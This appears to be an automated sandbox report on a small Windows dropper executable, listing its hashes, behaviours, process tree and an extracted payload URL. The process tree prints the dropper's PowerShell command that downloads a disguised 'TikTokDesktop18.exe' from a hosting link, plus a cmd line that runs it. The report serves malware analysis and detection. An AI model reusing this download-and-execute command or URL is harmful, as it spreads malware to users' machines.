Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28/11/2024, 21:59
Static task
static1
Behavioral task
behavioral1
Sample
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
Resource
win7-20240903-en
General
-
Target
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
-
Size
89KB
-
MD5
834924ac31fd6b5978bad287da3f99f9
-
SHA1
3289c8848c485ededbc7600171d74e9570553376
-
SHA256
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1
-
SHA512
feaaf94fd41de5e86fc90f4cc49a57326deb2f1edce1b96384e36924b81727ecabab9a88723348f8962f370564fd1565c1bea6f2230e6c28f710a55a50eb6639
-
SSDEEP
1536:z7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAw3OL:v7DhdC6kzWypvaQ0FxyNTBfAd
Malware Config
Extracted
https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2720 powershell.exe 6 2720 powershell.exe -
pid Process 2720 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 bitbucket.org 5 bitbucket.org 6 bitbucket.org -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2720 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2092 wrote to memory of 2712 2092 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe 31 PID 2092 wrote to memory of 2712 2092 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe 31 PID 2092 wrote to memory of 2712 2092 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe 31 PID 2092 wrote to memory of 2712 2092 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe 31 PID 2712 wrote to memory of 2720 2712 cmd.exe 32 PID 2712 wrote to memory of 2720 2712 cmd.exe 32 PID 2712 wrote to memory of 2720 2712 cmd.exe 32 PID 2712 wrote to memory of 1440 2712 cmd.exe 33 PID 2712 wrote to memory of 1440 2712 cmd.exe 33 PID 2712 wrote to memory of 1440 2712 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\system32\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;3⤵PID:1440
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
260B
MD51904675eec0f302424c4bde0956dab54
SHA1267c3174e35e0e2a7d104f98b3326f313f2e464e
SHA25645fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6
SHA512fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3